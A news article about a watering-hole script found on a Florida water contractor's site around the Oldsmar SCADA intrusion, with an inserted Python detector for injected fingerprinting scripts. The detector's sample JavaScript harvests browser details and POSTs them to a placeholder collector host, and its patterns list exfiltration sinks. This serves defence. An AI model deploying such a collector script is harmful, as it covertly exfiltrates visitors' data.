Colin Mc Hugo
Security Engineer Manager & CEO at Quantum Infinite Solutions Group Ltd.

Watering Hole Attack Was Used to Target Florida Water Utilities

May 20, 2021

An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what is known as a watering hole attack.

“This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event,” Dragos researcher Kent Backman said in a write-up published on Tuesday.

The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said.


Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully chosen website, which members of that group are known to visit, with the intention of gaining access to the victim's system and infecting it with malware.

In this particular case, however, the infected website did not deliver exploit code or attempt to gain access to visitors' systems. Instead, the injected code functioned as a browser enumeration and fingerprinting script that harvested various details about the website's visitors, including operating system, CPU, browser (and plugins), input methods, presence of a camera, accelerometer, microphone, time zone, location, video codecs, and screen dimensions.

The collected information was then exfiltrated to a database hosted on a Heroku app site (bdatac.herokuapp[.]com) that also stored the script. The app has since been taken down. Dragos suspects a vulnerable WordPress plugin may have been exploited to insert the script into the website's code.
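A site owner reviewing their own pages for an injected script like the one described above can look for the combination that makes it suspicious: many of the browser attributes listed (OS, CPU, plugins, input methods, camera/microphone, time zone, codecs, screen) collected together and then sent to a host that is not the site's own. The following is an added example, not Dragos' or the contractor's code; the sample injected snippet, the first-party host and the collector hostname are all constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Data categories the article says the script harvested, mapped to the
# browser APIs a script would normally read to obtain each of them.
FINGERPRINT_APIS = {
    "os/cpu": [r"navigator\.platform", r"navigator\.userAgent", r"hardwareConcurrency"],
    "browser/plugins": [r"navigator\.plugins", r"navigator\.mimeTypes"],
    "input methods": [r"maxTouchPoints", r"ontouchstart"],
    "camera/mic": [r"enumerateDevices", r"getUserMedia"],
    "accelerometer": [r"DeviceMotionEvent", r"DeviceOrientationEvent"],
    "time zone/locale": [r"getTimezoneOffset", r"resolvedOptions\(\)\.timeZone", r"navigator\.languages?"],
    "video codecs": [r"canPlayType", r"isTypeSupported"],
    "screen": [r"screen\.(?:width|height|colorDepth)", r"devicePixelRatio"],
}
# Ways a script can push collected data off the page.
EXFIL_SINKS = [r"\bfetch\(", r"XMLHttpRequest", r"sendBeacon", r"new\s+Image\(", r"\.src\s*="]
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")

def score_fingerprinting(js, first_party_hosts):
    """Report which fingerprint categories and exfil sinks a script touches and
    which third-party hosts it contacts; flag it when all three coincide."""
    categories = [name for name, pats in FINGERPRINT_APIS.items()
                  if any(re.search(p, js) for p in pats)]
    sinks = [p for p in EXFIL_SINKS if re.search(p, js)]
    external = sorted({urlparse(u).hostname for u in URL_RE.findall(js)
                       if urlparse(u).hostname not in first_party_hosts})
    suspicious = len(categories) >= 4 and bool(sinks) and bool(external)
    return {"categories": categories, "sinks": sinks,
            "external_hosts": external, "suspicious": suspicious}

# Constructed sample of an injected collector script (placeholder hostname).
SAMPLE_INJECTED_JS = """
(function(){var d={ua:navigator.userAgent,cpu:navigator.hardwareConcurrency,
plug:navigator.plugins.length,touch:navigator.maxTouchPoints,
tz:Intl.DateTimeFormat().resolvedOptions().timeZone,
scr:screen.width+'x'+screen.height,mp4:document.createElement('video').canPlayType('video/mp4')};
navigator.mediaDevices.enumerateDevices().then(function(x){d.dev=x.length;
fetch('https://collector.example-app.test/c',{method:'POST',body:JSON.stringify(d)});});})();
"""
# Constructed benign script: reads one attribute, sends nothing anywhere.
SAMPLE_BENIGN_JS = "window.addEventListener('resize', function(){ console.log(screen.width); });"

if __name__ == "__main__":
    for label, js in (("injected", SAMPLE_INJECTED_JS), ("benign", SAMPLE_BENIGN_JS)):
        print(label, score_fingerprinting(js, {"contractor.example"}))
```

Run it over each inline and first-party script on the site; hits with a third-party host that was never deployed by the site's own team are the ones to pull for review.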

No fewer than 1,000 end-user computers visited the infected site during the 58-day window beginning Dec. 20, 2020, before it was remediated on Feb. 16, 2021. “Those that interacted with the malicious code included computers from municipal water utility customers, state and local government agencies, various water industry-related private companies, and normal internet bot and website crawler traffic,” Backman said.

“Dragos' best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware's ability to impersonate legitimate web browser activity,” the researcher added.

Based on telemetry data gathered by the company, one of those 1,000 visits came from a computer residing in the network belonging to the City of Oldsmar on Feb. 5, the same day an unidentified adversary managed to increase the sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant.

The attackers were ultimately foiled in their attempt by an operator, who managed to catch the manipulation in real time and restored the concentration levels to undo the damage. The unauthorized access is said to have occurred via TeamViewer remote desktop software installed on one of the plant's several computers that were connected to the control system.

The Oldsmar plant cyberattack, and more recently the Colonial Pipeline ransomware incident, have set off concerns about the potential for tampering with industrial control systems deployed in critical infrastructure, prompting the U.S. government to take steps to bolster defenses by protecting federal networks and improving information-sharing between the U.S. government and the private sector on cyber issues, among others.

“This is not a typical watering hole,” Backman said. “We have medium confidence it did not directly compromise any organization. But it does represent an exposure risk to the water industry and highlights the importance of controlling access to untrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS) environments.”
